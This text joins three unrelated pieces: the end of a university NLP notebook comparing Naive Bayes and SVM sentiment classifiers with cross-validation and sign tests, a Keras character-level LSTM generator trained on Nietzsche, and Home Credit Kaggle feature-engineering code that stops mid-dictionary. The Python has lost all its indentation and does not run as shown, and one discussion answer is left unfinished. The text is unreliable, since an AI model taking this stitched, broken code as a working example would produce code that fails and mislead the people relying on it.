- etc.
- Random sampling/splitting
- Not used here (but you may choose to split this way in a non-educational situation)
#### (Q3.4) Write the code to implement 10-fold cross-validation using round-robin splitting for your Naive Bayes classifier from Q3.2 and compute the 10 accuracies. Report the final performance, which is the average of the performances per fold. If all splits perform equally well, this is a good sign. (1pt)
```
#
# Returns test_indices, and train_indices according to the round robin split algorithm.
#
def round_robin_split_indices(n_split):
test_indices = []
train_indices = []
for i in range(0, 1000):
if i % 10 == n_split:
test_indices.append(i)
else:
train_indices.append(i)
return test_indices, train_indices
#
# Performs the kfold validation.
#
def do_kfold(use_smoothing=False, use_stemming=False, n_grams=1):
sum_accuracy = 0
accuracies = []
total_variance = 0
all_results = []
bayes = BayesClassifier(use_smoothing, use_stemming, n_grams)
for i in range(0, 10):
print("Progress {0:.0f}%".format(i / 10 * 100))
test_indices, train_indices = round_robin_split_indices(i)
accuracy, result = bayes.train_and_classify(train_indices, test_indices)
sum_accuracy += accuracy
accuracies.append(accuracy)
for r in result:
all_results.append(r)
avg_accuracy = sum_accuracy / 10
for i in range(0, 10):
sqred_error = (accuracies[i] - avg_accuracy)**2
total_variance += sqred_error
variance_accuracy = total_variance / 10
return avg_accuracy, variance_accuracy, all_results
smoothing_avg_accuracy, smoothing_variance, smoothing_results_kfold = do_kfold(True, False, 1)
print("10-fold validation average accuracy for 10 folds: {0:.2f}%".format(smoothing_avg_accuracy))
```
#### (Q3.5) Write code to calculate and report variance, in addition to the final performance. (1pt)
**Please report all future results using 10-fold cross-validation now
(unless told to use the held-out test set).**
```
print("10-fold validation variance: {0:.2f}".format(smoothing_variance))
```
## Features, overfitting, and the curse of dimensionality
In the Bag-of-Words model, ideally we would like each distinct word in
the text to be mapped to its own dimension in the output vector
representation. However, real-world text is messy, and we need to decide
what we consider to be a word. For example, is "`word`" different
from "`Word`", from "`word`", or from "`words`"? Too strict a
definition, and the number of features explodes, while our algorithm
fails to learn anything generalisable. Too lax, and we risk destroying
our learning signal. In the following section, you will learn about
confronting the feature sparsity and the overfitting problems as they
occur in NLP classification tasks.
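As a toy illustration (a hypothetical token list, not the review data), a strict definition keeps every surface form distinct, while simple case- and punctuation-folding collapses them:

```
tokens = ["Word", "word", "word.", "words", "WORD"]

strict_vocab = set(tokens)                                  # every surface form is distinct
lax_vocab = set(t.lower().strip(".,!?") for t in tokens)    # case- and punctuation-folded

print(len(strict_vocab), len(lax_vocab))
```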
#### (Q3.6): A touch of linguistics (1pt)
Taking a step further, you can use stemming to
hash different inflections of a word to the same feature in the BoW
vector space. How does the performance of your classifier change when
you use stemming on your training and test datasets? Please use the [Porter stemming
algorithm](http://www.nltk.org/howto/stem.html) from NLTK.
Also, you should do cross validation and concatenate the predictions from all folds to compute the significance.
```
stemming_avg_accuracy, stemming_variance, stemming_results_kfold = do_kfold(True, True, 1)
print("10-fold stemming average accuracy {0:.2f}%".format(stemming_avg_accuracy))
```
#### (Q3.7): Is the difference between NB with smoothing and NB with smoothing+stemming significant? (0.5pt)
```
p_value = sign_test(stemming_results_kfold, smoothing_results_kfold)
print("p_value =", p_value)
```
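The `sign_test` helper used here is defined earlier in the notebook. As a hedged sketch (one common convention splits ties evenly between the two sides; the notebook's own helper may differ), a two-sided exact sign test over paired '+'/'-' result lists looks like:

```
from math import comb

def sign_test_sketch(results_a, results_b):
    # count paired cases where A is right and B wrong, the reverse, and ties
    plus = sum(a == '+' and b == '-' for a, b in zip(results_a, results_b))
    minus = sum(a == '-' and b == '+' for a, b in zip(results_a, results_b))
    null = sum(a == b for a, b in zip(results_a, results_b))
    # split ties evenly between the two sides (rounding down)
    n = plus + minus + 2 * (null // 2)
    k = min(plus, minus) + null // 2
    # two-sided exact binomial p-value under H0: each side wins with probability 0.5
    p = 2 * sum(comb(n, i) for i in range(k + 1)) * 0.5 ** n
    return min(p, 1.0)
```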
#### Q3.8: What happens to the number of features (i.e., the size of the vocabulary) when using stemming as opposed to (Q3.2)? (0.5pt)
Give actual numbers. You can use the held-out training set to determine these.
```
bayes = BayesClassifier(False, False, 1)
bayes_stemming = BayesClassifier(False, True, 1)
train_indices = list(range(0, 900))
bow = bayes.train(train_indices, [])
bow_stemming = bayes_stemming.train(train_indices, [])
print("Number of words without stemming: {}".format(bow.get_n_unique_words()))
print("Number of words with stemming: {}".format(bow_stemming.get_n_unique_words()))
```
#### Q3.9: Putting some word order back in (0.5+0.5pt=1pt)
A simple way of retaining some of the word
order information when using bag-of-words representations is to add **n-grams** features.
Retrain your classifier from (Q3.4) using **unigrams+bigrams** and
**unigrams+bigrams+trigrams** as features, and report accuracy and statistical significances (in comparison to the experiment at (Q3.4) for all 10 folds, and between the new systems).
```
bigram_avg_accuracy, bigram_variance, bigram_results_kfold = do_kfold(True, False, 2)
trigram_avg_accuracy, trigram_variance, trigram_results_kfold = do_kfold(True, False, 3)
print("Unigram average accuracy {0:.2f}%".format(smoothing_avg_accuracy))
print("Bigram average accuracy {0:.2f}%".format(bigram_avg_accuracy))
print("Trigram average accuracy {0:.2f}%".format(trigram_avg_accuracy))
print("Improvement from unigrams to unigrams+bigrams")
p_value = sign_test(bigram_results_kfold, smoothing_results_kfold)
print("p_value =", p_value)
print("\n\nImprovement from unigrams+bigrams to unigrams+bigrams+trigrams")
p_value = sign_test(bigram_results_kfold, trigram_results_kfold)
print("p_value =", p_value)
```
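As a minimal sketch of what the `n_grams` argument is assumed to do inside `BayesClassifier` (which is defined earlier in the notebook), unigram+bigram feature extraction can be written as:

```
def extract_ngrams(tokens, max_n):
    # all n-grams for n = 1 .. max_n, joined with underscores
    features = []
    for n in range(1, max_n + 1):
        for i in range(len(tokens) - n + 1):
            features.append('_'.join(tokens[i:i + n]))
    return features

print(extract_ngrams(['a', 'great', 'movie'], 2))
```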
#### Q3.10: How many features does the BoW model have to take into account now? (0.5pt)
How does this number compare (e.g., linear, square, cubed, exponential) to the number of features at (Q3.8)?
Use the held-out training set once again for this.
```
bayes_bigrams = BayesClassifier(False, False, 2)
bayes_trigrams = BayesClassifier(False, False, 3)
train_indices = list(range(0, 900))
bow_bigrams = bayes_bigrams.train(train_indices, [])
bow_trigrams = bayes_trigrams.train(train_indices, [])
print("Number of features with unigrams: {}".format(bow.get_n_unique_words()))
print("Number of features with bigrams: {}".format(bow_bigrams.get_n_unique_words()))
print("Number of features with trigrams: {}".format(bow_trigrams.get_n_unique_words()))
```
As you can see, the number of features grows from roughly 50,000 (unigrams) to roughly 500,000 (unigrams+bigrams) to roughly 1,500,000 (unigrams+bigrams+trigrams). The growth is clearly super-linear in the n-gram order, although the step-to-step ratio (about ×10, then ×3) is shrinking rather than constant, so the increase is better described as polynomial than as truly exponential.
# Support Vector Machines (4pts)
Though simple to understand, implement, and debug, the Naive Bayes
classifier has one major problem: its performance deteriorates (becomes
skewed) when it is used with features that are not independent (i.e.,
are correlated). The Support Vector Machine (SVM) is another popular
classifier that does not assume feature independence, although it does
not scale as well to big data and is not as simple to debug as Naive
Bayes.
You can find more details about SVMs in Chapter 7 of Bishop: Pattern Recognition and Machine Learning.
Other sources for learning SVM:
* http://web.mit.edu/zoya/www/SVM.pdf
* http://www.cs.columbia.edu/~kathy/cs4701/documents/jason_svm_tutorial.pdf
* https://pythonprogramming.net/support-vector-machine-intro-machine-learning-tutorial/
Use the scikit-learn implementation of
[SVM](http://scikit-learn.org/stable/modules/svm.html) with the default parameters.
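A minimal self-contained sketch of `sklearn.svm.LinearSVC` with default parameters on hypothetical toy count vectors (not the review features):

```
import numpy as np
from sklearn.svm import LinearSVC

# toy bag-of-words counts: column 0 ~ positive words, column 1 ~ negative words
X = np.array([[3, 0], [2, 1], [0, 3], [1, 2]])
y = ['pos', 'pos', 'neg', 'neg']

clf = LinearSVC()  # default parameters, as the question asks
clf.fit(X, y)
print(list(clf.predict([[4, 0], [0, 4]])))
```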
#### (Q4.1): Train SVM and compare to Naive Bayes (2pt)
Train an SVM classifier (sklearn.svm.LinearSVC) using your features. Compare the
classification performance of the SVM classifier to that of the Naive
Bayes classifier from (Q3.4) and report the numbers.
Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better?
```
from sklearn import preprocessing, model_selection, neighbors, svm
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import LinearSVC as SVC
from nltk.tokenize import TreebankWordTokenizer
#
## Returns test_indices and train_indices according to the round-robin split algorithm,
## adjusted compared to the earlier version, as the features object has 2000 rows rather than 1000.
#
def round_robin_split_indices_features(n_split):
test_indices = []
train_indices = []
test_indices_features = []
for i in range(0, 1000):
if i % 10 == n_split:
test_indices.append(i)
else:
train_indices.append(i)
test_indices_features = test_indices + [x + 1000 for x in test_indices]
train_indices_features = train_indices + [x + 1000 for x in train_indices]
return train_indices_features, train_indices, test_indices_features, test_indices
# example: split 5 is testsplit at the moment
#train_features, train_ind, test_features, test_ind = round_robin_split_indices(5)
#
## vectorizes original text documents
#
def get_vectorized_corpus(reviews, indices, tags, without_closed):
corpus = []
for review in reviews:
if (review['cv'] not in indices):
continue
words = []
word_tag = []
for line in review['content']:
for word_pair in line:
word = word_pair[0].lower()
if(tags != False):
tag = word_pair[1]
if(without_closed != False):
if(tag.startswith(('V', 'N', 'RB', 'J'))):
word_tag = word + "_" + tag
else:
continue
else:
word_tag = word + "_" + tag
else:
word_tag = word
words.append(word_tag)
corpus.append(' '.join(map(str, words)))
count_vect = CountVectorizer(tokenizer = TreebankWordTokenizer().tokenize)
vectorized_features = count_vect.fit_transform(corpus).toarray()
return vectorized_features
#
## get original sentiment labels
#
def get_labels(reviews, indices):
labels = []
for review in reviews:
if (review['cv'] not in indices):
continue
else:
labels.append(review["sentiment"])
return labels
#
## for obtained indices, one svm is fitted and evaluated according to training and test documents
#
def train_and_classify_one_svm(features, train_indices_features, train_indices, test_indices_features, test_indices):
# training indices
train_features = features[train_indices_features]
train_labels = get_labels(reviews, train_indices)
# test indices
test_features = features[test_indices_features]
test_labels = get_labels(reviews, test_indices)
# linear SVM on training feature vector and labels
classifier = SVC()
classifier.fit(train_features, train_labels)
# label prediction for test_feature vector
label_prediction = classifier.predict(test_features)
# tracking results
total = 0
correct = 0
results = []
for i in range(0, len(test_labels)):
if label_prediction[i] == test_labels[i]:
correct += 1
results.append('+')
else:
results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, results
#
## similar to NB, kfold for SVM (the only difference is slightly different indices, due to the structure of the features object)
#
def do_kfold_svm(tags=False, without_closed=False):
# create features depending on type of tags [notags, alltags, withoutclosedform]
features = get_vectorized_corpus(reviews, list(range(0,1000)), tags, without_closed)
sum_accuracy = 0
accuracies = []
total_variance = 0
all_results = []
for i in range(0, 10):
print("Progress {0:.0f}%".format(i / 10 * 100))
train_features, train_ind, test_features, test_ind = round_robin_split_indices_features(i)
accuracy, results = train_and_classify_one_svm(features, train_features, train_ind, test_features, test_ind)
sum_accuracy += accuracy
accuracies.append(accuracy)
for r in results:
all_results.append(r)
avg_accuracy = sum_accuracy / 10
for i in range(0, 10):
sqred_error = (accuracies[i] - avg_accuracy)**2
total_variance += sqred_error
variance_accuracy = total_variance / 10
return avg_accuracy, variance_accuracy, all_results
# calculate svm kfold
svm_avg_accuracy, svm_variance, svm_results_kfold = do_kfold_svm()
print("10-fold average accuracy {0:.2f}%".format(svm_avg_accuracy))
print("10-fold accuracy variance {0:.2f}%".format(svm_variance))
# significant difference to Q3.4?
p_value = sign_test(smoothing_results_kfold, svm_results_kfold)
print("p_value =", p_value)
```
### More linguistics
Now add in part-of-speech features. You will find the
movie review dataset has already been POS-tagged for you. Try to
replicate what Pang et al. were doing:
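Given (word, tag) pairs in the pre-tagged format the dataset is assumed to provide, word+POS features are plain concatenations (toy sentence for illustration):

```
tagged = [('the', 'DT'), ('movie', 'NN'), ('was', 'VBD'), ('great', 'JJ')]

# word+POS features, as in Pang et al.
word_pos = [w.lower() + '_' + t for w, t in tagged]
print(word_pos)

# keeping only open-class words: nouns (N*), verbs (V*), adjectives (J*), adverbs (RB*)
open_class = [w.lower() + '_' + t for w, t in tagged if t.startswith(('V', 'N', 'RB', 'J'))]
print(open_class)
```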
#### (Q4.2) Replace your features with word+POS features, and report performance with the SVM. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significant? Why? (1pt)
```
# What changes when POS tags are taken into consideration as well?
svm_avg_accuracy_with_tags, svm_variance_with_tags, svm_results_kfold_with_tags = do_kfold_svm(tags=True)
print("10-fold average accuracy {0:.2f}%".format(svm_avg_accuracy_with_tags))
print("10-fold accuracy variance {0:.2f}%".format(svm_variance_with_tags))
# significant difference to Q3.4?
p_value = sign_test(svm_results_kfold, svm_results_kfold_with_tags)
print("p_value =", p_value)
```
#### (Q4.3) Discard all closed-class words from your data (keep only nouns (N*), verbs (V*), adjectives (J*) and adverbs (RB*)), and report performance. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better than when we don't discard the closed-class words? Why? (1pt)
```
svm_avg_accuracy_without_closed, svm_variance_without_closed, svm_results_kfold_without_closed = do_kfold_svm(tags=True, without_closed=True)
print("10-fold average accuracy {0:.2f}%".format(svm_avg_accuracy_without_closed))
print("10-fold accuracy variance {0:.2f}%".format(svm_variance_without_closed))
# significant difference to all POS tags allowed?
p_value = sign_test(svm_results_kfold_with_tags, svm_results_kfold_without_closed)
print("p_value =", p_value)
```
# (Q5) Discussion (max. 500 words). (5pts)
> Based on your experiments, what are the effective features and techniques in sentiment analysis? What information do different features encode?
Why is this important? What are the limitations of these features and techniques?
*Write your answer here in max. 500 words.*
Discussion:
Effective features:
- Smoothing: assigning a non-zero probability to words not seen in the training data, rather than excluding them, leads to significantly better accuracy than Naive Bayes without smoothing.
- Stemming:
# Submission
```
# Write your names and student numbers here:
# Dirk Hoekstra #12283878
# Philipp Lintl #12152498
```
**That's it!**
- Check if you answered all questions fully and correctly.
- Download your completed notebook using `File -> Download .ipynb`
- Also save your notebook as a Github Gist. Get it by choosing `File -> Save as Github Gist`. Make sure that the gist has a secret link (not public).
- Check if your answers are all included in the file you submit (e.g. check the Github Gist URL)
- Submit your .ipynb file and link to the Github Gist via *Canvas*. One submission per group.
```
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.layers import LSTM
from keras.optimizers import RMSprop
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
path = get_file('nietzsche.txt', origin='https://s3.amazonaws.com/text-datasets/nietzsche.txt')
text = open(path).read().lower()
print('corpus length:', len(text))
chars = sorted(list(set(text)))
print('total chars:', len(chars))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
maxlen = 40 # split the text into sequences of this length
step = 3 # overlap between consecutive sequences
sentences = []
next_chars = []
for i in range(0, len(text) - maxlen, step):
sentences.append(text[i: i + maxlen]) # input string of length 40
next_chars.append(text[i + maxlen]) # the next character to predict
print('num sequences:', len(sentences))
len(sentences[0]), sentences[0]
next_chars[0]
print('Vectorization...')
# the input is a string of length maxlen, so the maxlen dimension is needed
X = np.zeros((len(sentences), maxlen, len(chars)), dtype=bool)
# the output is a single character, so maxlen is not needed
y = np.zeros((len(sentences), len(chars)), dtype=bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char_indices[char]] = 1 # one-hot vector: True only at the target character
y[i, char_indices[next_chars[i]]] = 1
print(X.shape, y.shape)
print(X[0][0])
print(y[0])
print('Build model...')
model = Sequential()
# the LSTM input shape is (batch size, sequence length, input dimension); batch size is omitted
# changing maxlen does not change the number of parameters (they are shared across time steps)
# 128 is the dimension of the internal projection and of the output (they are the same)
model.add(LSTM(128, input_shape=(maxlen, len(chars))))
# attach a fully connected layer to the 128-dimensional output to produce a character vector
model.add(Dense(len(chars))) # output
model.add(Activation('softmax'))
model.summary()
optimizer = RMSprop(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=optimizer)
# this means 200285 sequences of length 40 (each element is a 57-dimensional vector)
print(X.shape, y.shape)
def sample(preds, temperature=1.0):
preds = np.asarray(preds).astype('float64')
# temperature rescales the distribution: values below 1 sharpen it, values above 1 flatten it
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probas = np.random.multinomial(1, preds, 1)
# probas is a one-hot draw, so argmax returns the sampled index
return np.argmax(probas)
for iteration in range(1, 60):
print()
print('-' * 50)
print('Iteration', iteration)
# feed the sequence data and train
model.fit(X, y, batch_size=128, epochs=1)
# generate the continuation of 40 characters taken from a random position in the training data
diversity = 0.5 # sampling temperature; the original Keras example loops over several values
start_index = random.randint(0, len(text) - maxlen - 1)
generated = ''
sentence = text[start_index: start_index + maxlen]
generated += sentence
print('----- Generating with seed: "' + sentence + '"')
sys.stdout.write(generated)
# generate 400 characters
# note: predict() is stateless here; the full 40-character window is re-fed at every step
for i in range(400):
x = np.zeros((1, maxlen, len(chars)))
# one-hot encode sentence
# sentence is shifted forward through the 400 iterations, appending each generated character
for t, char in enumerate(sentence):
x[0, t, char_indices[char]] = 1.0
# output distribution over the 57 characters
# the input has shape (sequence length=40, data dimension=57)
preds = model.predict(x, verbose=0)[0]
# sample from the distribution instead of always picking the most probable character
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
generated += next_char
# keep the input at length 40: append the character just generated and drop the first one
# this sentence becomes the next input
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
```
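To make the `temperature` rescaling in `sample` above concrete, here is a small stand-alone computation (pure Python, no model needed): temperatures below 1 sharpen the distribution and temperatures above 1 flatten it.

```
from math import exp, log

def rescale(probs, temperature):
    # log, divide by temperature, re-exponentiate, renormalize (as in sample())
    logits = [log(p) / temperature for p in probs]
    exps = [exp(l) for l in logits]
    total = sum(exps)
    return [e / total for e in exps]

probs = [0.5, 0.3, 0.2]
print([round(p, 3) for p in rescale(probs, 0.5)])  # sharper than probs
print([round(p, 3) for p in rescale(probs, 2.0)])  # flatter than probs
```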
```
from google.colab import files
files.upload()
!mkdir -p ~/.kaggle
!cp kaggle.json ~/.kaggle/
!pip install kaggle
!chmod 600 /root/.kaggle/kaggle.json
!kaggle competitions download -c home-credit-default-risk
!unzip \*.zip -d dataset
!rm -R sample_data
!rm *zip *csv
import os
import gc
import numpy as np
import pandas as pd
import multiprocessing as mp
from scipy.stats import kurtosis
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import MinMaxScaler
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LogisticRegression
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
from sklearn.model_selection import train_test_split, cross_val_score, StratifiedKFold, KFold
import xgboost as xgb
from xgboost import XGBClassifier
from functools import partial
from sklearn.ensemble import RandomForestClassifier
import lightgbm as lgb
warnings.simplefilter(action='ignore', category=FutureWarning)
DATA_DIRECTORY = "/content/dataset"
df_train = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_train.csv'))
df_test = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_test.csv'))
df = pd.concat([df_train, df_test])
del df_train, df_test; gc.collect()
df = df[df['AMT_INCOME_TOTAL'] < 20000000]
df = df[df['CODE_GENDER'] != 'XNA']
df['DAYS_EMPLOYED'].replace(365243, np.nan, inplace=True)
df['DAYS_LAST_PHONE_CHANGE'].replace(0, np.nan, inplace=True)
def get_age_group(days_birth):
age_years = -days_birth / 365
if age_years < 27: return 1
elif age_years < 40: return 2
elif age_years < 50: return 3
elif age_years < 65: return 4
elif age_years < 99: return 5
else: return 0
docs = [f for f in df.columns if 'FLAG_DOC' in f]
df['DOCUMENT_COUNT'] = df[docs].sum(axis=1)
df['NEW_DOC_KURT'] = df[docs].kurtosis(axis=1)
df['AGE_RANGE'] = df['DAYS_BIRTH'].apply(lambda x: get_age_group(x))
df['EXT_SOURCES_PROD'] = df['EXT_SOURCE_1'] * df['EXT_SOURCE_2'] * df['EXT_SOURCE_3']
df['EXT_SOURCES_WEIGHTED'] = df.EXT_SOURCE_1 * 2 + df.EXT_SOURCE_2 * 1 + df.EXT_SOURCE_3 * 3
warnings.filterwarnings('ignore', r'All-NaN (slice|axis) encountered')
for function_name in ['min', 'max', 'mean', 'nanmedian', 'var']:
feature_name = 'EXT_SOURCES_{}'.format(function_name.upper())
df[feature_name] = getattr(np, function_name)(
df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']], axis=1)
df['CREDIT_TO_ANNUITY_RATIO'] = df['AMT_CREDIT'] / df['AMT_ANNUITY']
df['CREDIT_TO_GOODS_RATIO'] = df['AMT_CREDIT'] / df['AMT_GOODS_PRICE']
df['ANNUITY_TO_INCOME_RATIO'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']
df['CREDIT_TO_INCOME_RATIO'] = df['AMT_CREDIT'] / df['AMT_INCOME_TOTAL']
df['INCOME_TO_EMPLOYED_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_EMPLOYED']
df['INCOME_TO_BIRTH_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_BIRTH']
df['EMPLOYED_TO_BIRTH_RATIO'] = df['DAYS_EMPLOYED'] / df['DAYS_BIRTH']
df['ID_TO_BIRTH_RATIO'] = df['DAYS_ID_PUBLISH'] / df['DAYS_BIRTH']
df['CAR_TO_BIRTH_RATIO'] = df['OWN_CAR_AGE'] / df['DAYS_BIRTH']
df['CAR_TO_EMPLOYED_RATIO'] = df['OWN_CAR_AGE'] / df['DAYS_EMPLOYED']
df['PHONE_TO_BIRTH_RATIO'] = df['DAYS_LAST_PHONE_CHANGE'] / df['DAYS_BIRTH']
def do_mean(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].mean().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
def do_median(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].median().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
def do_std(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].std().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
def do_sum(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].sum().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
group = ['ORGANIZATION_TYPE', 'NAME_EDUCATION_TYPE', 'OCCUPATION_TYPE', 'AGE_RANGE', 'CODE_GENDER']
df = do_median(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_MEDIAN')
df = do_std(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_STD')
df = do_mean(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_MEAN')
df = do_std(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_STD')
df = do_mean(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_MEAN')
df = do_std(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_STD')
df = do_mean(df, group, 'AMT_CREDIT', 'GROUP_CREDIT_MEAN')
df = do_mean(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_MEAN')
df = do_std(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_STD')
def label_encoder(df, categorical_columns=None):
if not categorical_columns:
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
for col in categorical_columns:
df[col], uniques = pd.factorize(df[col])
return df, categorical_columns
def drop_application_columns(df):
drop_list = [
'CNT_CHILDREN', 'CNT_FAM_MEMBERS', 'HOUR_APPR_PROCESS_START',
'FLAG_EMP_PHONE', 'FLAG_MOBIL', 'FLAG_CONT_MOBILE', 'FLAG_EMAIL', 'FLAG_PHONE',
'FLAG_OWN_REALTY', 'REG_REGION_NOT_LIVE_REGION', 'REG_REGION_NOT_WORK_REGION',
'REG_CITY_NOT_WORK_CITY', 'OBS_30_CNT_SOCIAL_CIRCLE', 'OBS_60_CNT_SOCIAL_CIRCLE',
'AMT_REQ_CREDIT_BUREAU_DAY', 'AMT_REQ_CREDIT_BUREAU_MON', 'AMT_REQ_CREDIT_BUREAU_YEAR',
'COMMONAREA_MODE', 'NONLIVINGAREA_MODE', 'ELEVATORS_MODE', 'NONLIVINGAREA_AVG',
'FLOORSMIN_MEDI', 'LANDAREA_MODE', 'NONLIVINGAREA_MEDI', 'LIVINGAPARTMENTS_MODE',
'FLOORSMIN_AVG', 'LANDAREA_AVG', 'FLOORSMIN_MODE', 'LANDAREA_MEDI',
'COMMONAREA_MEDI', 'YEARS_BUILD_AVG', 'COMMONAREA_AVG', 'BASEMENTAREA_AVG',
'BASEMENTAREA_MODE', 'NONLIVINGAPARTMENTS_MEDI', 'BASEMENTAREA_MEDI',
'LIVINGAPARTMENTS_AVG', 'ELEVATORS_AVG', 'YEARS_BUILD_MEDI', 'ENTRANCES_MODE',
'NONLIVINGAPARTMENTS_MODE', 'LIVINGAREA_MODE', 'LIVINGAPARTMENTS_MEDI',
'YEARS_BUILD_MODE', 'YEARS_BEGINEXPLUATATION_AVG', 'ELEVATORS_MEDI', 'LIVINGAREA_MEDI',
'YEARS_BEGINEXPLUATATION_MODE', 'NONLIVINGAPARTMENTS_AVG', 'HOUSETYPE_MODE',
'FONDKAPREMONT_MODE', 'EMERGENCYSTATE_MODE'
]
for doc_num in [2,4,5,6,7,9,10,11,12,13,14,15,16,17,19,20,21]:
drop_list.append('FLAG_DOCUMENT_{}'.format(doc_num))
df.drop(drop_list, axis=1, inplace=True)
return df
df, le_encoded_cols = label_encoder(df, None)
df = drop_application_columns(df)
#df = pd.get_dummies(df)
bureau = pd.read_csv(os.path.join(DATA_DIRECTORY, 'bureau.csv'))
bureau['CREDIT_DURATION'] = -bureau['DAYS_CREDIT'] + bureau['DAYS_CREDIT_ENDDATE']
bureau['ENDDATE_DIF'] = bureau['DAYS_CREDIT_ENDDATE'] - bureau['DAYS_ENDDATE_FACT']
bureau['DEBT_PERCENTAGE'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_CREDIT_SUM_DEBT']
bureau['DEBT_CREDIT_DIFF'] = bureau['AMT_CREDIT_SUM'] - bureau['AMT_CREDIT_SUM_DEBT']
bureau['CREDIT_TO_ANNUITY_RATIO'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_ANNUITY']
def one_hot_encoder(df, categorical_columns=None, nan_as_category=True):
original_columns = list(df.columns)
if not categorical_columns:
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
df = pd.get_dummies(df, columns=categorical_columns, dummy_na=nan_as_category)
categorical_columns = [c for c in df.columns if c not in original_columns]
return df, categorical_columns
def group(df_to_agg, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):
agg_df = df_to_agg.groupby(aggregate_by).agg(aggregations)
agg_df.columns = pd.Index(['{}{}_{}'.format(prefix, e[0], e[1].upper())
for e in agg_df.columns.tolist()])
return agg_df.reset_index()
def group_and_merge(df_to_agg, df_to_merge, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):
agg_df = group(df_to_agg, prefix, aggregations, aggregate_by= aggregate_by)
return df_to_merge.merge(agg_df, how='left', on= aggregate_by)
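# A toy demonstration (hypothetical frame) of the MultiIndex flattening that group()
# performs: (column, stat) pairs become PREFIX + COLUMN + '_' + STAT names.
_toy = pd.DataFrame({'SK_ID_CURR': [1, 1, 2], 'AMT_CREDIT_SUM': [100.0, 200.0, 50.0]})
_toy_agg = _toy.groupby('SK_ID_CURR').agg({'AMT_CREDIT_SUM': ['max', 'mean']})
_toy_agg.columns = pd.Index(['TOY_{}_{}'.format(e[0], e[1].upper()) for e in _toy_agg.columns.tolist()])
print(_toy_agg.reset_index().columns.tolist())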
def get_bureau_balance(path, num_rows= None):
bb = pd.read_csv(os.path.join(path, 'bureau_balance.csv'))
bb, categorical_cols = one_hot_encoder(bb, nan_as_category= False)
bb_processed = bb.groupby('SK_ID_BUREAU')[categorical_cols].mean().reset_index()
agg = {'MONTHS_BALANCE': ['min', 'max', 'mean', 'size']}
bb_processed = group_and_merge(bb, bb_processed, '', agg, 'SK_ID_BUREAU')
del bb; gc.collect()
return bb_processed
bureau, categorical_cols = one_hot_encoder(bureau, nan_as_category= False)
bureau = bureau.merge(get_bureau_balance(DATA_DIRECTORY), how='left', on='SK_ID_BUREAU')
bureau['STATUS_12345'] = 0
for i in range(1,6):
bureau['STATUS_12345'] += bureau['STATUS_{}'.format(i)]
features = ['AMT_CREDIT_MAX_OVERDUE', 'AMT_CREDIT_SUM_OVERDUE', 'AMT_CREDIT_SUM',
'AMT_CREDIT_SUM_DEBT', 'DEBT_PERCENTAGE', 'DEBT_CREDIT_DIFF', 'STATUS_0', 'STATUS_12345']
agg_length = bureau.groupby('MONTHS_BALANCE_SIZE')[features].mean().reset_index()
agg_length.rename({feat: 'LL_' + feat for feat in features}, axis=1, inplace=True)
bureau = bureau.merge(agg_length, how='left', on='MONTHS_BALANCE_SIZE')
del agg_length; gc.collect()
BUREAU_AGG = {
'SK_ID_BUREAU': ['nunique'],
'DAYS_CREDIT': ['min', 'max', 'mean'],
'DAYS_CREDIT_ENDDATE': ['min', 'max'],
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean', 'sum'],
'AMT_ANNUITY': ['mean'],
'DEBT_CREDIT_DIFF': ['mean', 'sum'],
'MONTHS_BALANCE_MEAN': ['mean', 'var'],
